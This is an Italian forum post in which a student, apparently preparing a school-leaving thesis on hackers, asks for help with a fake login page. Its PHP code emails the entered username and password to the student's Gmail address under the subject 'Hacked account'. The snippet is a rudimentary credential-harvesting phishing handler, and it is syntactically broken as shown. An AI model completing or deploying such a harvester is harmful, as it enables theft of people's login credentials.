Salve a tutti...sto impazzendo con un programma che sto facendo per l'esame di maturità...
Ho scelto di are una tesina sugli Hacker e il professore mi ha proposto di realizzare un programma che rubi password in una "fantomatica" pagina creata da me,in cui vi sono due campi: User e Password...che tramite un form,quando premo il pulsante,mando i valori contenuti dentro user e password(precedentemente salvati in due variabili di nome $User e $Pass) alla mia casella di posta gmail...per ora sono riuscito come alternativa a salvare i dati in un file di testo...ma sto impazzendo per inviarli via mail,perché non riesco né a configurare il file php.ini non capsico come si fa con gmail,né capisco se ho commesso errori di sintassi....
il codice è il seguente

Codice PHP:
<?php $User $_POST['email']; $Pass $_POST['pass']; $destinatario "xxxxxxxxxxxxxx@gmail.com"$oggetto="Hacked account"$messaggio='Nome utente: $User Password: $Pass'$header="From: [email]xxxxxxxxxxx@gmail.com[/email]"mail($destinatario$oggetto$messaggio$header); ?>
1)Sbaglio qualcosa?
2) Come configuro il php.ini e vari file collegati alla funzione mail() per inviare messaggi di posta al mio indirizzo gmail?